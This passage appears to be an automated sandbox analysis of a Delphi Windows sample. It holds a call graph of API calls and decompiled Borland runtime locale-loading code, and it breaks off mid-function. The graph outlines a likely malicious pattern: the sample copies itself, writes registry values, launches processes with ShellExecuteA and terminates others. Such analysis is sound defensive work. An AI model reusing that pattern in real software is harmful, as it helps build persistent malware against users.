13379 418904 13377->13379 13378 417d84 27 API calls 13380 4187ff 13378->13380 13381 41890c ShellExecuteA 13379->13381 13382 406efc 25 API calls 13380->13382 13383 403d1c 7 API calls 13381->13383 13384 418810 13382->13384 13383->13370 13758 4185e8 13384->13758 13387 4029a4 36 API calls 13388 418823 13387->13388 13389 406efc 25 API calls 13388->13389 13390 41882e 13389->13390 13391 406efc 25 API calls 13390->13391 13392 41883f 13391->13392 13393 417d84 27 API calls 13392->13393 13394 41884a 13393->13394 13395 4188aa 13394->13395 13396 418855 13394->13396 13398 406ffc 25 API calls 13395->13398 13397 406ffc 25 API calls 13396->13397 13399 418866 13397->13399 13401 4188bb 13398->13401 13400 4029a4 36 API calls 13399->13400 13402 418878 13400->13402 13404 4188cc ShellExecuteA 13401->13404 13768 404208 13402->13768 13406 4188d6 13404->13406 13407 403d1c 7 API calls 13406->13407 13407->13364 13409 418a14 13904 417828 13409->13904 13411 418a3d 13412 406efc 25 API calls 13411->13412 13413 418a4c 13412->13413 13908 417750 13413->13908 13416 406efc 25 API calls 13417 418a63 13416->13417 13914 4177bc 13417->13914 13419 418a6d 13420 418a78 13419->13420 13421 418aa4 Sleep 13419->13421 13920 417318 13420->13920 13421->13419 13424 403edc 25 API calls 13425 418a94 13424->13425 13426 403eac 11 API calls 13425->13426 13427 418aca 13426->13427 13428 418540 13427->13428 14019 403e44 13428->14019 13430 418558 13431 418b90 13430->13431 13432 403e44 26 API calls 13431->13432 13433 418ba8 13432->13433 13433->13325 13435 418a03 TranslateMessage DispatchMessageA 13434->13435 13436 418a0f Sleep 13434->13436 13435->13436 13437 418570 13436->13437 14026 41839c 13437->14026 13441 4185c3 13440->13441 14071 418560 13441->14071 13444 4185e3 13444->13325 13445 4185cc OpenProcess TerminateProcess 13445->13444 13447 403bab 13446->13447 13450 403b18 13447->13450 13451 403b54 13450->13451 13452 403b27 13450->13452 13451->13334 13452->13451 13456 404d84 13452->13456 13460 402670 13452->13460 13466 405824 13452->13466 13457 404d94 GetModuleFileNameA 13456->13457 13459 404db0 13456->13459 13472 404fc0 GetModuleFileNameA RegOpenKeyExA 13457->13472 13459->13452 13461 402675 13460->13461 13462 402688 13460->13462 13511 40209c 13461->13511 13462->13452 13463 40267b 13463->13462 13522 402778 13463->13522 13467 405834 13466->13467 13468 405865 13466->13468 13467->13468 13674 404dcc 13467->13674 13468->13452 13470 405854 LoadStringA 13679 403f78 13470->13679 13473 405003 RegOpenKeyExA 13472->13473 13474 405043 13472->13474 13473->13474 13475 405021 RegOpenKeyExA 13473->13475 13490 404e08 GetModuleHandleA 13474->13490 13475->13474 13477 4050cc lstrcpyn GetThreadLocale GetLocaleInfoA 13475->13477 13479 4051e6 13477->13479 13480 405103 13477->13480 13479->13459 13480->13479 13483 405113 lstrlen 13480->13483 13481 405088 RegQueryValueExA 13482 4050a6 RegCloseKey 13481->13482 13482->13459 13485 40512b 13483->13485 13485->13479 13486 405150 lstrcpyn LoadLibraryExA 13485->13486 13487 405178 13485->13487 13486->13487 13487->13479 13488 405182 lstrcpyn LoadLibraryExA 13487->13488 13488->13479 13489 4051b4 lstrcpyn LoadLibraryExA 13488->13489 13489->13479 13491 404e30 GetProcAddress 13490->13491 13493 404e70 13490->13493 13492 404e41 13491->13492 13491->13493 13492->13493 13499 404e57 lstrcpyn 13492->13499 13495 404f92 RegQueryValueExA 13493->13495 13503 404ea3 13493->13503 13507 404df4 13493->13507 13494 404eb6 lstrcpyn 13501 404ed4 13494->13501 13495->13481 13495->13482 13498 404f7e lstrcpyn 13498->13495 13499->13495 13500 404df4 CharNextA 13500->13501 13501->13495 13501->13498 13501->13500 13504 404ef3 lstrcpyn FindFirstFileA 13501->13504 13502 404df4 CharNextA 13502->13503 13503->13494 13503->13495 13504->13495 13505 404f1e FindClose lstrlen 13504->13505 13505->13495 13506 404f3d lstrcpyn lstrlen 13505->13506 13506->13501 13508 404dfc 13507->13508 13509 404e07 13508->13509 13510 404df6 CharNextA 13508->13510 13509->13495 13509->13502 13510->13508 13512 4020b0 13511->13512 13515 4020b5 13511->13515 13528 4019b0 RtlInitializeCriticalSection 13512->13528 13514 4020e2 RtlEnterCriticalSection 13516 4020ec 13514->13516 13515->13514 13515->13516 13517 4020c1 13515->13517 13516->13517 13535 401fa8 13516->13535 13517->13463 13520 40220d RtlLeaveCriticalSection 13521 402217 13520->13521 13521->13463 13523 40272c 13522->13523 13525 402751 13523->13525 13637 405a90 13523->13637 13645 402720 13525->13645 13529 4019d4 RtlEnterCriticalSection 13528->13529 13530 4019de 13528->13530 13529->13530 13531 4019fc LocalAlloc 13530->13531 13534 401a16 13531->13534 13532 401a5b RtlLeaveCriticalSection 13533 401a65 13532->13533 13533->13515 13534->13532 13534->13533 13536 401fb8 13535->13536 13537 401fe4 13536->13537 13540 402008 13536->13540 13541 401f1c 13536->13541 13537->13540 13546 401dbc 13537->13546 13540->13520 13540->13521 13550 401770 13541->13550 13543 401f2c 13545 401f39 13543->13545 13559 401e90 13543->13559 13545->13536 13547 401e11 13546->13547 13548 401dda 13546->13548 13547->13548 13601 401d0c 13547->13601 13548->13540 13554 40178c 13550->13554 13552 401796 13566 40165c 13552->13566 13554->13552 13556 4017e7 13554->13556 13558 4017a2 13554->13558 13570 4014c8 13554->13570 13578 4013c4 13554->13578 13582 4015a4 13556->13582 13558->13543 13589 401e44 13559->13589 13562 4013c4 LocalAlloc 13563 401eb4 13562->13563 13564 401ebc 13563->13564 13593 401be8 13563->13593 13564->13545 13568 4016a2 13566->13568 13567 4016d2 13567->13558 13568->13567 13569 4016be VirtualAlloc 13568->13569 13569->13567 13569->13568 13571 4014d7 VirtualAlloc 13570->13571 13573 401527 13571->13573 13574 401504 13571->13574 13573->13554 13586 40137c 13574->13586 13577 401514 VirtualFree 13577->13573 13579 4013e0 13578->13579 13580 40137c LocalAlloc 13579->13580 13581 401426 13580->13581 13581->13554 13584 4015d3 13582->13584 13583 40162c 13583->13558 13584->13583 13585 401600 VirtualFree 13584->13585 13585->13584 13587 401324 LocalAlloc 13586->13587 13588 401387 13587->13588 13588->13573 13588->13577 13590 401e56 13589->13590 13591 401e4d 13589->13591 13590->13562 13591->13590 13598 401c18 13591->13598 13594 401bf6 13593->13594 13596 401c05 13593->13596 13595 401dbc 9 API calls 13594->13595 13597 401c03 13595->13597 13596->13564 13597->13564 13599 40222c 9 API calls 13598->13599 13600 401c39 13599->13600 13600->13590 13602 401d22 13601->13602 13603 401d61 13602->13603 13604 401d4d 13602->13604 13613 401daa 13602->13613 13606 401924 3 API calls 13603->13606 13614 401924 13604->13614 13607 401d5f 13606->13607 13608 401be8 9 API calls 13607->13608 13607->13613 13609 401d85 13608->13609 13610 401d9f 13609->13610 13624 401c3c 13609->13624 13629 401434 13610->13629 13613->13548 13615 40194a 13614->13615 13617 4019a3 13614->13617 13633 4016f0 13615->13633 13617->13607 13619 4013c4 LocalAlloc 13620 401967 13619->13620 13621 4015a4 VirtualFree 13620->13621 13622 40197e 13620->13622 13621->13622 13622->13617 13623 401434 LocalAlloc 13622->13623 13623->13617 13625 401c41 13624->13625 13627 401c4f 13624->13627 13626 401c18 9 API calls 13625->13626 13628 401c4e 13626->13628 13627->13610 13628->13610 13630 40143f 13629->13630 13631 40137c LocalAlloc 13630->13631 13632 40145a 13630->13632 13631->13632 13632->13613 13635 401727 13633->13635 13634 401767 13634->13619 13635->13634 13636 401741 VirtualFree 13635->13636 13636->13635 13638 405ac5 TlsGetValue 13637->13638 13639 405a9f 13637->13639 13640 405aaa 13638->13640 13641 405acf 13638->13641 13639->13525 13648 405a4c 13640->13648 13641->13525 13643 405aaf TlsGetValue 13644 405abe 13643->13644 13644->13525 13655 403df4 13645->13655 13650 405a52 13648->13650 13649 405a76 13649->13643 13650->13649 13654 405a38 LocalAlloc 13650->13654 13652 405a72 13652->13649 13653 405a82 TlsSetValue 13652->13653 13653->13649 13654->13652 13658 403d1c 13655->13658 13660 403d35 13658->13660 13659 403d54 13668 403c90 13659->13668 13660->13659 13663 403d65 13660->13663 13662 403d5e 13662->13663 13664 403da6 13663->13664 13665 403da0 FreeLibrary 13663->13665 13666 403ddb 13664->13666 13667 403dd3 ExitProcess 13664->13667 13665->13664 13669 403cf1 13668->13669 13673 403c9a GetStdHandle WriteFile GetStdHandle WriteFile 13668->13673 13671 403cfa MessageBoxA 13669->13671 13672 403d0d 13669->13672 13671->13672 13672->13662 13673->13662 13675 404df3 13674->13675 13678 404dd6 13674->13678 13675->13470 13676 404d84 30 API calls 13677 404dec 13676->13677 13677->13470 13678->13675 13678->13676 13684 403f4c 13679->13684 13681 403f88 13689 403e88 13681->13689 13685 403f74 13684->13685 13686 403f50 13684->13686 13685->13681 13687 402670 25 API calls 13686->13687 13688 403f5d 13687->13688 13688->13681 13690 403ea9 13689->13690 13691 403e8e 13689->13691 13690->13468 13691->13690 13693 402690 13691->13693 13694 4026a8 13693->13694 13695 402695 13693->13695 13694->13690 13695->13694 13696 402778 11 API calls 13695->13696 13696->13694 13700 40286a 13697->13700 13698 402862 CharNextA 13698->13700 13699 402884 13701 4028d3 13699->13701 13702 40288e CharNextA 13699->13702 13703 4028bf CharNextA 13699->13703 13706 4028b5 CharNextA 13699->13706 13707 402898 CharNextA 13699->13707 13700->13698 13700->13699 13713 404478 13701->13713 13702->13699 13703->13699 13705 40293b 13705->13336 13706->13699 13707->13699 13708 4028e8 CharNextA 13710 4028dc 13708->13710 13709 402920 CharNextA 13709->13710 13710->13705 13710->13708 13710->13709 13711 402916 CharNextA 13710->13711 13712 4028f2 CharNextA 13710->13712 13711->13710 13712->13710 13714 404485 13713->13714 13718 4044b5 13713->13718 13716 403f4c 25 API calls 13714->13716 13717 404491 13714->13717 13715 403e88 11 API calls 13715->13717 13716->13718 13717->13710 13718->13715 13721 407148 13719->13721 13720 407169 13720->13364 13720->13365 13721->13720 13781 406d40 13721->13781 13724 40700c 13723->13724 13725 403f78 25 API calls 13724->13725 13726 407014 13725->13726 13726->13373 13847 404348 13727->13847 13730 404478 25 API calls 13731 417dba 13730->13731 13732 417dca ExpandEnvironmentStringsA 13731->13732 13733 406efc 25 API calls 13732->13733 13734 417dda 13733->13734 13735 403edc 25 API calls 13734->13735 13736 417de4 13735->13736 13737 403e88 11 API calls 13736->13737 13738 417df9 13737->13738 13739 4186d0 13738->13739 13740 4186e4 13739->13740 13849 40760c 13740->13849 13744 418705 13745 4029a4 36 API calls 13744->13745 13746 41871a 13745->13746 13747 418722 CopyFileA 13746->13747 13748 418735 13747->13748 13749 403eac 11 API calls 13748->13749 13750 418742 13749->13750 13751 406efc 13750->13751 13752 406f0b 13751->13752 13753 406f24 13752->13753 13754 406f2d 13752->13754 13755 403e88 11 API calls 13753->13755 13757 4043a8 25 API calls 13754->13757 13756 406f2b 13755->13756 13756->13378 13757->13756 13759 418602 13758->13759 13760 41860a RegOpenKeyExA 13759->13760 13761 41863a 13760->13761 13762 41865c RegSetValueExA RegCloseKey 13761->13762 13763 41867c 13762->13763 13764 403e88 11 API calls 13763->13764 13765 418684 13764->13765 13766 403eac 11 API calls 13765->13766 13767 418691 13766->13767 13767->13387 13769 404219 13768->13769 13770 40423f 13769->13770 13771 404256 13769->13771 13772 404478 25 API calls 13770->13772 13773 403f4c 25 API calls 13771->13773 13774 40424c 13772->13774 13773->13774 13775 404287 13774->13775 13776 403edc 25 API calls 13774->13776 13776->13775 13779 403eb2 13777->13779 13778 403ed8 13778->13409 13779->13778 13780 402690 11 API calls 13779->13780 13780->13779 13784 40a664 13781->13784 13783 406d59 13783->13720 13785 40a672 13784->13785 13786 405824 56 API calls 13785->13786 13787 40a69c 13786->13787 13794 407cec 13787->13794 13792 403eac 11 API calls 13793 40a6cf 13792->13793 13793->13783 13803 407d00 13794->13803 13797 403edc 13798 403ee0 13797->13798 13799 403ef0 13797->13799 13798->13799 13801 403f4c 25 API calls 13798->13801 13800 403f1e 13799->13800 13802 402690 11 API calls 13799->13802 13800->13792 13801->13799 13802->13800 13804 407d24 13803->13804 13807 407d4f 13804->13807 13816 407934 13804->13816 13806 407da7 13808 403f78 25 API calls 13806->13808 13807->13806 13814 407d64 13807->13814 13812 407cfb 13808->13812 13809 407d9d 13811 404478 25 API calls 13809->13811 13810 403e88 11 API calls 13810->13814 13811->13812 13812->13797 13813 404478 25 API calls 13813->13814 13814->13809 13814->13810 13814->13813 13815 407934 56 API calls 13814->13815 13815->13814 13822 40795d 13816->13822 13817 40796e 13835 407c8b 13817->13835 13820 407a16 11 API calls 13820->13822 13822->13817 13822->13820 13824 407a5e 13822->13824 13832 407928 13822->13832 13825 407ac9 13824->13825 13826 407a6f 13824->13826 13827 407c8b 11 API calls 13825->13827 13831 406fb0 13825->13831 13838 4078ac 13825->13838 13826->13825 13829 407b67 13826->13829 13827->13825 13829->13831 13842 407904 13829->13842 13831->13822 13833 403e88 11 API calls 13832->13833 13834 407932 13833->13834 13834->13822 13836 403e88 11 API calls 13835->13836 13837 407c98 13836->13837 13837->13807 13839 4078bd 13838->13839 13840 406d40 56 API calls 13839->13840 13841 4078fd 13840->13841 13841->13825 13843 40791c 13842->13843 13845 407910 13842->13845 13844 402778 11 API calls 13843->13844 13846 407923 13844->13846 13845->13831 13846->13831 13848 40434c ExpandEnvironmentStringsA 13847->13848 13848->13730 13850 40761f 13849->13850 13873 4043a8 13850->13873 13853 4074a0 13854 4074b5 13853->13854 13859 4074dd 13854->13859 13880 40a628 13854->13880 13884 40b13c 13859->13884 13860 407503 13861 407553 13860->13861 13893 40747c 13860->13893 13863 403eac 11 API calls 13861->13863 13864 407577 13863->13864 13864->13744 13867 407527 13867->13861 13868 4075d8 25 API calls 13867->13868 13869 40753f 13868->13869 13870 4074a0 58 API calls 13869->13870 13871 407547 13870->13871 13871->13861 13901 407748 13871->13901 13874 4043da 13873->13874 13877 4043ad 13873->13877 13875 403e88 11 API calls 13874->13875 13876 4043d0 13875->13876 13876->13853 13877->13874 13878 4043c1 13877->13878 13879 403f78 25 API calls 13878->13879 13879->13876 13881 40a62f 13880->13881 13882 405824 56 API calls 13881->13882 13883 40a647 13882->13883 13883->13859 13885 403edc 25 API calls 13884->13885 13886 40b14b 13885->13886 13887 4074f8 13886->13887 13888 404478 25 API calls 13886->13888 13889 403f20 13887->13889 13888->13887 13891 403f24 13889->13891 13890 403f48 13890->13860 13891->13890 13892 402690 11 API calls 13891->13892 13892->13890 13894 404348 13893->13894 13895 407486 GetFileAttributesA 13894->13895 13896 407491 13895->13896 13896->13861 13897 4075d8 13896->13897 13898 4075eb 13897->13898 13899 4043a8 25 API calls 13898->13899 13900 4075fc 13899->13900 13900->13867 13902 404348 13901->13902 13903 407754 CreateDirectoryA 13902->13903 13903->13861 13905 41782e 13904->13905 13929 417538 13905->13929 13907 417843 13907->13411 13909 417762 13908->13909 13910 41779b 13909->13910 13912 403edc 25 API calls 13909->13912 13911 403e88 11 API calls 13910->13911 13913 4177b0 13911->13913 13912->13910 13913->13416 13916 4177ce 13914->13916 13915 417807 13917 403e88 11 API calls 13915->13917 13916->13915 13918 403edc 25 API calls 13916->13918 13919 41781c 13917->13919 13918->13915 13919->13419 13921 403e88 11 API calls 13920->13921 13927 41734a 13921->13927 13923 4173fa 13924 403e88 11 API calls 13923->13924 13925 417412 13924->13925 13925->13424 13927->13923 14001 4172ac 726517A8 13927->14001 14003 4172d0 726517A8 13927->14003 14005 404150 13927->14005 13930 41753e 13929->13930 13941 417134 13930->13941 13932 417553 13933 403e88 11 API calls 13932->13933 13934 417565 13933->13934 13935 403e88 11 API calls 13934->13935 13936 41756d 13935->13936 13937 403e88 11 API calls 13936->13937 13938 417575 13937->13938 13939 403e88 11 API calls 13938->13939 13940 41757d 13939->13940 13940->13907 13942 41713a 13941->13942 13947 416120 13942->13947 13944 41714f 13951 40ba84 13944->13951 13946 4171a3 13946->13932 13948 416127 13947->13948 13950 41614a 13948->13950 13956 416284 13948->13956 13950->13944 13986 40ba10 13951->13986 13954 40ba9e 13954->13946 13957 416298 13956->13957 13959 4162ca 13957->13959 13960 416700 13957->13960 13959->13950 13962 416710 13960->13962 13961 416749 13961->13959 13962->13961 13964 416700 56 API calls 13962->13964 13965 4166c4 13962->13965 13964->13962 13966 4166e2 13965->13966 13967 4166d0 13965->13967 13978 4115c0 13966->13978 13971 41156c 13967->13971 13972 405824 56 API calls 13971->13972 13973 41158f 13972->13973 13982 411534 13973->13982 13979 4115ca 13978->13979 13980 4115de 13979->13980 13981 41156c 56 API calls 13979->13981 13980->13962 13981->13980 13983 411542 13982->13983 13984 40a5a8 56 API calls 13983->13984 13985 411561 13984->13985 13985->13985 13996 40b9a0 13986->13996 13988 40ba1a 13989 40ba60 FreeResource 13988->13989 13992 40ba74 13988->13992 13990 40ba6f 13989->13990 13989->13992 13991 40b988 56 API calls 13990->13991 13991->13992 13992->13954 13993 40b988 13992->13993 13994 40a628 56 API calls 13993->13994 13995 40b99a 13994->13995 13995->13954 13997 40b9ad FindResourceA LoadResource 13996->13997 14000 40b9d1 13996->14000 13998 40ba02 13997->13998 13998->13988 13999 40b9df FindResourceA LoadResource 13999->13998 13999->14000 14000->13998 14000->13999 14002 4172cb 14001->14002 14002->13927 14004 4172f5 14003->14004 14004->13927 14006 404193 14005->14006 14007 404154 14005->14007 14006->13927 14008 40415e 14007->14008 14009 403edc 14007->14009 14010 404188 14008->14010 14011 404171 14008->14011 14015 403f4c 25 API calls 14009->14015 14016 403ef0 14009->14016 14012 404478 25 API calls 14010->14012 14013 404478 25 API calls 14011->14013 14018 404176 14012->14018 14013->14018 14014 403f1e 14014->13927 14015->14016 14016->14014 14017 402690 11 API calls 14016->14017 14017->14014 14018->13927 14020 402670 25 API calls 14019->14020 14021 403e5a CreateThread 14020->14021 14021->13430 14022 403e0c 14021->14022 14023 403e14 14022->14023 14024 402690 11 API calls 14023->14024 14025 403e32 14024->14025 14027 4183ac 14026->14027 14032 418240 14027->14032 14030 403e88 11 API calls 14031 4183dc 14030->14031 14031->13325 14033 41827a 14032->14033 14050 406d84 14033->14050 14039 418358 CloseHandle 14040 41836b 14039->14040 14041 403eac 11 API calls 14040->14041 14043 41837b 14041->14043 14044 403eac 11 API calls 14043->14044 14045 418388 14044->14045 14045->14030 14046 41833c 14046->14039 14047 4182b8 14047->14039 14047->14046 14048 406d84 25 API calls 14047->14048 14060 407660 14047->14060 14064 417d2c 14047->14064 14048->14047 14051 406d92 14050->14051 14052 404478 25 API calls 14051->14052 14053 406d9d 14052->14053 14054 417cec 14053->14054 14067 417a70 14054->14067 14057 417d0c 14058 417a70 17 API calls 14057->14058 14059 417d17 14058->14059 14059->14047 14061 407673 14060->14061 14062 4043a8 25 API calls 14061->14062 14063 407685 14062->14063 14063->14047 14065 417a70 17 API calls 14064->14065 14066 417d37 14065->14066 14066->14047 14068 417a7f GetModuleHandleA 14067->14068 14070 417bb4 14067->14070 14069 417a94 16 API calls 14068->14069 14068->14070 14069->14070 14070->14057 14074 4183ec 14071->14074 14073 41856a 14073->13444 14073->13445 14075 417cec 17 API calls 14074->14075 14076 418405 14075->14076 14077 417d0c 17 API calls 14076->14077 14078 418417 14077->14078 14079 41843c CloseHandle 14078->14079 14080 418425 14078->14080 14081 417d2c 17 API calls 14078->14081 14079->14073 14080->14079 14081->14078 14082 417974 WSAStartup 14083 417987 14082->14083 14085 417998 14082->14085 14086 40a56c 14083->14086 14087 40a573 14086->14087 14088 403edc 25 API calls 14087->14088 14089 40a58b 14088->14089 14089->14085

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
